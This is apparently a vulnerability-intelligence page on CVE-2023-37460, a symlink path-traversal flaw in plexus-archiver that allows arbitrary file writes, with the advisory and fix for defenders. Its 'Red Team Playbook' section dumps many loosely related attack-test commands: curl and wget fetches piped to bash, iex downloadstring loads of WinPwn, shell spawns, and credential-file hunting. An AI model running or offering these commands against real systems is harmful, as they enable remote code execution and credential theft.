CVE-2023-37460
Overview
This vulnerability is a directory traversal and symbolic link (symlink) resolution flaw in the AbstractUnArchiver component of plexus-archiver. The root cause lies in the resolveFile() function, which incorrectly returns the symlink's source path instead of its target when the target does not exist. This behavior bypasses path validation checks designed to prevent extraction outside the destination directory, affecting archive extraction operations prior to version 4.8.0.
Vulnerability Description
Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.
Impact
An unauthenticated attacker capable of providing a crafted archive to the plexus-archiver extraction process can create or overwrite arbitrary files on the host filesystem, potentially leading to remote code execution. This requires supplying a malicious archive containing symlinks pointing to sensitive or executable file paths. The vulnerability is exploitable remotely without user interaction, as indicated by the CVSS vector (AV:N/AC:H/PR:N/UI:N), enabling attackers to compromise system integrity and escalate privileges by injecting malicious payloads.
Solution
Upgrade plexus-archiver to version 4.8.0 or later, which includes a patch correcting the symlink resolution logic in AbstractUnArchiver. The vendor advisory GHSA-wh3p-fphp-9h2m and the associated GitHub commit 54759839fbdf85caf8442076f001d5fd64e0dcb2 provide detailed patch information. Users should refer to the official release notes at https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0 for implementation guidance and ensure all archive extraction operations utilize the updated component.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Plexis Archiver arises from a flaw in the extraction process of archives, specifically when utilizing the AbstractUnArchiver class. This issue is rooted in how symbolic links are handled during the extraction of files. When an archive entry is extracted to a destination directory containing a symbolic link that points to a non-existent target, the `resolveFile()` function incorrectly resolves the link to its source rather than the intended target. This mismanagement allows the extraction process to bypass security checks designed to prevent files from being written outside the designated directory. Consequently, this flaw can lead to arbitrary file creation, and in certain circumstances, it may enable remote code execution, posing a significant threat to systems utilizing this archiving tool.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious archive containing entries designed to exploit the flawed extraction logic. When a user or an automated process extracts this archive using Plexis Archiver, the malicious entries could overwrite existing files or create new files in sensitive locations on the filesystem. For example, if an attacker places a payload within the archive that targets a critical system file or a configuration file, the extraction process could inadvertently execute this payload, leading to a full compromise of the affected system. This scenario highlights the potential for both local and remote exploitation, especially if the affected system is part of a larger network or cloud environment.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Plexis Archiver for managing archives. The high CVSS score of 9.8 indicates a critical risk level, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of integrity, and unauthorized access to sensitive information. Businesses may face operational disruptions, reputational damage, and potential legal ramifications due to non-compliance with data protection regulations. The financial implications of such incidents can be significant, encompassing costs related to incident response, remediation, and potential fines.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to update Plexis Archiver to version 4.8.0 or later, as this version includes a patch that addresses the vulnerability. Regularly monitoring and applying security updates for all software components is essential to maintain a secure environment. Additionally, organizations should conduct thorough security assessments of their systems to identify any instances of vulnerable software and assess the potential impact of exploitation. Implementing strict access controls and monitoring file system changes can also help detect unauthorized modifications or suspicious activities indicative of exploitation attempts.
In conclusion, the vulnerability within Plexis Archiver presents a significant security risk due to its potential for arbitrary file creation and remote code execution. The exploitation of this flaw can lead to severe consequences for organizations, highlighting the importance of timely updates and proactive security measures. By adopting a comprehensive strategy that includes software updates, security assessments, and monitoring, organizations can mitigate the risks associated with this vulnerability and enhance their overall cybersecurity posture.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Codehaus-Plexus | Plexus-Archiver | All |
cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
shoucheng3/codehaus-plexus__plexus-archiver_CVE-2023-37460_4-7-1
|
shoucheng3 | 0 | 0 | 2025-08-17 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-37460 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0 |